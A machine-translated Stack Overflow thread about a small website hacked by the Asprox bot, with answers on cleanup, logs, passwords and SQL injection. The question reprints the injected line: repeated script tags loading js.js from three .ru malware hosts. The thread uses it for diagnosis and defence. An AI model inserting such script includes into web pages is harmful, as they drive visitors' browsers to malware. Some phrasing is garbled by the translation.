我父亲今天打电话给我,说他们去他的网站的人有168种病毒试图下载到他们的电脑上。 他根本不是技术人员,用WYSIWYG编辑器构建了整个东西。

我打开他的网站并查看了源代码,在关闭HTML标记之前,源代码底部有一行Javascript包含。 他们包括这个文件(以及许多其他文件): http//www.98hs.ru/js.js < - 在你去URL之前关掉JAVASCRIPT。

所以我现在评论它。 事实证明他的FTP密码是一个普通的字典单词六个字母长,所以我们认为这是如何被黑客攻击。 我们已经将他的密码更改为一个8位以上的非单词字符串(他不会用密码短语,因为他是一个狩猎的傻瓜)。

在98hs.ru上做了一个whois ,发现它是从智利的服务器托管的。 实际上还有一个与之相关的电子邮件地址,但我严重怀疑这个人是罪魁祸首。 可能只是其他一些被黑客入侵的网站......

我不知道在这一点上该做什么,因为我以前从未处理过这类事情。 有人有什么建议吗?

他通过webhost4life.com使用普通的jane un-secured ftp。 我甚至没有看到在他们的网站上 sftp的方法。 我在想他的用户名和密码被截获了吗?

因此,为了使这与社区更相关,您应采取哪些步骤/最佳做法,以保护您的网站免遭黑客入侵?

为了记录,这里是“神奇地”添加到他的文件中的代码行(并且不在他的计算机上的文件中 - 我留下它注释掉,只是为了绝对确定它不会做任何事情在这个页面上,虽然我确信杰夫会防范这个):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

===============>>#1 票数:14 已采纳

尝试收集尽可能多的信息。 查看主持人是否可以为您提供显示您帐户所有FTP连接的日志。 您可以使用它们来查看它是否是用于进行更改并可能获取IP地址的FTP连接。

如果您使用的是预装软件,如Wordpress,Drupal或其他任何您未编码的软件,则上传代码中可能存在允许进行此类修改的漏洞。 如果是自定义构建,请仔细检查允许用户上载文件或修改现有文件的任何位置。

第二件事是按原样转储网站并检查所有内容以进行其他修改。 它可能只是一个单独的修改,但如果他们通过FTP进入,谁知道还有什么在那里。

将您的站点恢复到已知的良好状态,如果需要,请升级到最新版本。

您还必须考虑到一定程度的回报。 损坏是否值得尝试跟踪此人,或者这是您生活和学习并使用更强密码的东西?

===============>>#2 票数:14

我知道这在游戏中有点晚了,但是在一个已知属于ASPRox机器人复兴的网站列表中提到了JavaScript提到的URL,该网站已于六月开始(至少在我们被标记为它)。 有关它的一些细节提到如下:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

令人讨厌的是,数据库中的每个varchar类型字段都被“感染”以吐出对此URL的引用,其中浏览器获取一个小的iframe,将其转换为机器人。 可以在此处找到针对此的基本SQL修复:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

但可怕的是,病毒会在系统表中查找要感染的值,并且许多共享主机计划也会为其客户共享数据库空间。 所以很可能甚至不是你父亲的网站被感染了,但是他的托管集群中的其他人的网站写了一些不好的代码并打开了SQL注入攻击的大门。

如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并给他们一个指向该SQL代码的链接来修复整个系统。 您可以修复自己受影响的数据库表,但很可能正在进行感染的机器人将再次通过该漏洞并感染整个批次。

希望这能为您提供更多信息。

编辑:还有一个想法,如果他使用其中一个主机在线设计工具来构建他的网站,所有这些内容可能都坐在一个列中,并被感染了。

===============>>#3 票数:5

你提到你的爸爸正在使用网站发布工具。

如果发布工具从他的计算机发布到服务器,则可能是他的本地文件是干净的,并且他只需要重新发布到服务器。

他应该看看他的服务器是否有不同于普通FTP的登录方法,但是......这不是很安全,因为它通过互联网将密码作为明文发送。

===============>>#4 票数:3

使用六个字的字符密码,他可能被强行逼迫。 这比他的ftp被截获的可能性更大,但也可能是这样。

从更强的密码开始。 (8个字符仍然相当弱)

查看此链接到互联网安全博客是否有帮助。

===============>>#5 票数:2

该网站是否只是纯静态HTML? 即他没有设法编写一个上传页面,允许任何人驾驶上传受损的脚本/页面?

如果他们有任何可用的FTP日志,为什么不询问webhost4life并向他们报告问题。 你永远不会知道,他们可能非常善于接受,并准确地找到你发生的事情?

我为一个共享的主机工作,我们总是欢迎这些报告,并且通常可以确定基于攻击的确切向量,并建议客户出错的地方。

===============>>#6 票数:0

拔下Web服务器而不关闭它以避免关闭脚本。 通过另一台计算机分析硬盘作为数据驱动器,看看你是否可以通过日志文件和那种性质的东西来确定罪魁祸首。 验证代码是否安全,然后从备份中还原。

===============>>#7 票数:0

这发生在我最近在ipower上托管的我的客户端。 我不确定你的托管环境是否基于Apache,但是如果确定要仔细检查你没有创建的.htaccess文件,特别是在webroot上面和图像目录内部,因为它们往往会在那里注入一些肮脏同样(他们根据他们在推荐中的来源重定向人员)。 还要检查您为未编写的代码创建的任何内容。

===============>>#8 票数:-1

我们显然是从同一个家伙被黑了! 或者机器人,在我们的例子中。 他们在一些古老的经典ASP网站上使用URL注入SQL,而这些ASP网站已经没有了。 我们发现攻击IP并在IIS中阻止它们。 现在我们必须重构所有旧的ASP。 因此,我的建议是首先查看IIS日志,以查找问题是否在您站点的代码或服务器配置中。

  ask by cmcculloh translate from so

未解决问题?本站智能推荐: